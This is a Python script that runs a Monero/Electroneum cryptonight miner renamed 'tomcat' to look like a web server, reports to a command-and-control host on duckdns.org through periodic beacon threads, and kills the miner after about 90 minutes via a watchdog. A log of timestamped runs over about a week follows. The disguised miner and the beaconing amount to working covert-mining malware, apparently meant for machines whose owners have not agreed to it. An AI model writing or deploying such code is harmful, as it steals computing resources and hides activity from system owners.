import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:28:05.040573
#2018-02-17 17:15:01.490500
#2018-02-17 19:03:03.651664
#2018-02-17 20:50:09.436059
#2018-02-17 22:37:02.103107
#2018-02-18 00:20:06.143535
#2018-02-18 02:11:04.612589
#2018-02-18 03:58:05.851724
#2018-02-18 05:48:04.738443
#2018-02-18 07:40:06.923692
#2018-02-18 09:26:07.401449
#2018-02-18 11:12:03.895072
#2018-02-18 12:59:04.873382
#2018-02-18 14:46:06.344866
#2018-02-18 16:34:05.617108
#2018-02-18 18:23:03.898120
#2018-02-18 20:08:07.069611
#2018-02-18 21:55:07.212088
#2018-02-18 23:44:06.991550
#2018-02-19 01:30:03.939592
#2018-02-19 03:18:02.222549
#2018-02-19 05:03:01.420300
#2018-02-19 06:47:05.884968
#2018-02-19 08:38:06.064035
#2018-02-19 10:26:08.980429
#2018-02-19 12:14:07.373333
#2018-02-19 14:03:04.040862
#2018-02-19 15:51:07.573755
#2018-02-19 17:39:05.601252
#2018-02-19 19:27:07.594748
#2018-02-19 21:13:05.335239
#2018-02-19 23:00:05.645533
#2018-02-20 00:45:07.196530
#2018-02-20 02:34:02.207559
#2018-02-20 04:23:01.983281
#2018-02-20 06:07:04.662850
#2018-02-20 07:52:06.668751
#2018-02-20 09:37:05.667032
#2018-02-20 11:20:09.399512
#2018-02-20 13:08:08.004372
#2018-02-20 14:51:07.426426
#2018-02-20 16:36:01.339196
#2018-02-20 18:23:07.247383
#2018-02-20 20:14:01.259912
#2018-02-20 22:00:06.146061
#2018-02-20 23:41:06.715120
#2018-02-21 01:27:06.938012
#2018-02-21 03:16:05.194233
#2018-02-21 05:03:07.374979
#2018-02-21 06:50:07.814953
#2018-02-21 08:38:03.926782
#2018-02-21 10:24:04.594214
#2018-02-21 12:11:09.995164
#2018-02-21 14:01:06.698099
#2018-02-21 15:45:14.149485
#2018-02-21 17:39:05.079209
#2018-02-21 19:24:07.301744
#2018-02-21 21:12:01.664567
#2018-02-21 22:58:07.318312
#2018-02-22 00:47:06.849641
#2018-02-22 02:34:06.533236
#2018-02-22 04:19:06.734613
#2018-02-22 06:06:05.017582
#2018-02-22 07:52:03.531274
#2018-02-22 09:40:07.771061
#2018-02-22 11:25:09.915638
#2018-02-22 13:11:03.725346
#2018-02-22 14:59:04.178851
#2018-02-22 16:44:07.977871
#2018-02-22 18:29:09.185414
#2018-02-22 20:22:04.973364
#2018-02-22 22:09:04.512319
#2018-02-22 23:55:10.098204
#2018-02-23 01:43:04.391159
#2018-02-23 03:31:08.545369
#2018-02-23 05:16:06.517635
#2018-02-23 07:01:06.487883
#2018-02-23 08:50:08.475392
#2018-02-23 11:06:09.384788
#2018-02-23 13:01:05.858528
#2018-02-23 14:48:01.468142
#2018-02-23 16:37:08.495066
#2018-02-23 18:24:05.168574
#2018-02-23 20:09:01.976386
#2018-02-23 21:59:05.778310
#2018-02-23 23:48:06.777869
#2018-02-24 01:34:07.275189
#2018-02-24 03:23:04.209364
#2018-02-24 05:08:08.003311
#2018-02-24 06:58:04.787255
#2018-02-24 08:48:01.524450
#2018-02-24 10:59:01.407623
#2018-02-24 12:47:06.011419
#2018-02-24 14:36:07.891411
#2018-02-24 16:23:04.035214
#2018-02-24 18:16:06.159365
#2018-02-24 20:03:07.433200
#2018-02-24 21:46:07.074530
#2018-02-25 01:51:05.563673
#2018-02-25 04:54:05.039074
#2018-02-25 08:23:01.716875